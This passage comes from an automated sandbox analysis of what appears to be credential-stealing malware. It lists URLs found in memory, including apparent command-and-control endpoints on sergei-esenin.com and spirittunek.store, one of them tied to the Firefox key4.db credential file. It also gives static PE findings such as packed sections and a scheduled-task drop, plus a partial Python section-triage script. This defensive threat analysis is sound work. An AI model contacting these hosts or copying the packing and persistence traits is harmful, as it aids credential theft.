Source: file.exe, 00000000.00000003.1487793177.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458847673.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1459122490.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1474136490.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487775149.000000000120A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487656293.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1477815226.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1504653859.000000000120A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1498095593.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1460412273.0000000005991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apie
Source: 8138ba21a1.exe, 00000012.00000003.2180479528.0000000001192000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apif
Source: file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apim
Source: file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apimo
Source: file.exe, 00000000.00000003.1487775149.000000000120A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apipV
Source: 8138ba21a1.exe, 00000012.00000003.2096131872.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apis
Source: file.exe, 00000000.00000003.1417736971.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apit
Source: 8138ba21a1.exe, 00000012.00000003.2180479528.0000000001192000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2117059192.0000000001191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiw
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/e
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.0000000001119000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/p
Source: 8138ba21a1.exe, 00000012.00000003.2021461230.00000000059AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/w
Source: file.exe, 00000000.00000003.1445425292.0000000005994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/api
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apial
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apir3.default-release/key4.dbPK
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apiu
Source: firefox.exe, 0000001D.00000002.2168505988.000001C9678CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 0000001D.00000002.2157086315.000001C967403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001D.00000002.2157086315.000001C967403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/api
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2041476436.000001C96F758000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2129414948.000001C963357000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2044345773.000001C969540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2300171636.000001C96F5F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2041476436.000001C96F758000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C96831E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2155269647.000001C967103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F74A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2116291536.0000003BB00FB000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C9674AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F748000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F00D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001D.00000002.2175868045.000001C968399000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F0C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2051838135.000001C967649000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2054319782.000001C96763E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2050257508.000001C96763A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000003.1460153484.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049402279.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F7E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.1460153484.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049402279.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.c3a9
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F73F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96967B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F73F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96965D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C9696DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96967B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2260814057.000001C96A8BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001D.00000002.2168505988.000001C9678EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121556768.000001C956FC9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2300171636.000001C96F5F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2126645860.000001C962BA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121418359.000001C956F90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C96831E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2122168164.000001C95725D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2122168164.000001C957203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121556768.000001C956FC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96965D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.1965127477.000002034F64F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.1973462429.0000013C6029F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121556768.000001C956FC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001D.00000002.2148441089.000001C966B4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2123319128.000001C958BDA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2123319128.000001C958B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE

System Summary

Source: 136916b3ff.exe, 0000000F.00000002.1996242810.0000000000A12000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_969886b5-e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name:
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: .idata
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: .idata
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .rsrc
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .idata
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .rsrc
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: 8138ba21a1.exe.7.dr Static PE information: section name:
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .rsrc
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name: .rsrc
Source: bd214fbd32.exe.7.dr Static PE information: section name: .idata
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: .idata
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .rsrc
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .idata
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
Source: num.exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num[1].exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00425823 6_2_00425823
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00425C4D 6_2_00425C4D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994520936468647
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982384621934605
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: Section: iropgfss ZLIB complexity 0.9943036808076225
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982384621934605
Source: skotes.exe.3.dr Static PE information: Section: iropgfss ZLIB complexity 0.9943036808076225
Source: random[1].exe.7.dr Static PE information: Section: ZLIB complexity 0.9994520936468647
Source: 8138ba21a1.exe.7.dr Static PE information: Section: ZLIB complexity 0.9994520936468647
Source: random[1].exe0.7.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: bd214fbd32.exe.7.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: Section: ZLIB complexity 0.9982384621934605
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: Section: iropgfss ZLIB complexity 0.9943036808076225
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: bd214fbd32.exe.7.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.7.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
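The static PE findings above reduce to three section-table traits: section names that are empty or made of special characters, random eight-letter names such as iropgfss and fzxkvimr whose data has a ZLIB complexity near 1.0 (zlib cannot shrink it, so it is packed or encrypted), and a .text section with IMAGE_SCN_MEM_WRITE set so the unpacker can patch code in place. The script below is an added example, not the sandbox's or the samples' code; it parses the section table with only the standard library, treats "ZLIB complexity" as compressed-size divided by raw-size (an assumption about how the report computes it), and runs against a minimal PE image constructed inline to mimic these samples.

```python
"""Static PE section triage for the traits listed in this report. Added example,
not sandbox or sample code. The PE image built by build_sample() is constructed
test input, not one of the dropped files."""
import random
import struct
import zlib

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
KNOWN_NAMES = {".text", ".rdata", ".data", ".rsrc", ".idata", ".reloc",
               ".bss", ".tls", ".pdata", ".edata", ".CRT"}


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw size ratio; about 1.0 means zlib found no redundancy (packed/encrypted)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table.
    Returns a list of (name, characteristics, raw_data)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt
    sections = []
    for i in range(num_sections):
        (name, _vsize, _va, raw_size, raw_ptr, _rel, _lin, _nrel, _nlin,
         chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + i * 40)
        sections.append((name.rstrip(b"\0"), chars, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def triage(pe: bytes):
    """Return (section_label, reason) findings for the three traits in the report."""
    findings = []
    for name, chars, data in parse_sections(pe):
        printable = bool(name) and all(0x20 < c < 0x7F for c in name)
        label = name.decode("ascii") if printable else repr(name)
        if name == b".text" and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((label, "writable .text section: code can patch itself in place (unpacker stub)"))
        if not printable:
            findings.append((label, "section name empty or contains special characters"))
        elif label not in KNOWN_NAMES:
            findings.append((label, "non-standard section name"))
        ratio = zlib_complexity(data)
        if data and ratio > 0.98:
            findings.append((label, f"near-incompressible data, zlib complexity {ratio:.4f} (packed or encrypted payload)"))
    return findings


def build_sample(sections):
    """Assemble a minimal PE32 image from (name, characteristics, data) tuples. Constructed input only."""
    num, size_opt, pe_off = len(sections), 0xE0, 0x40
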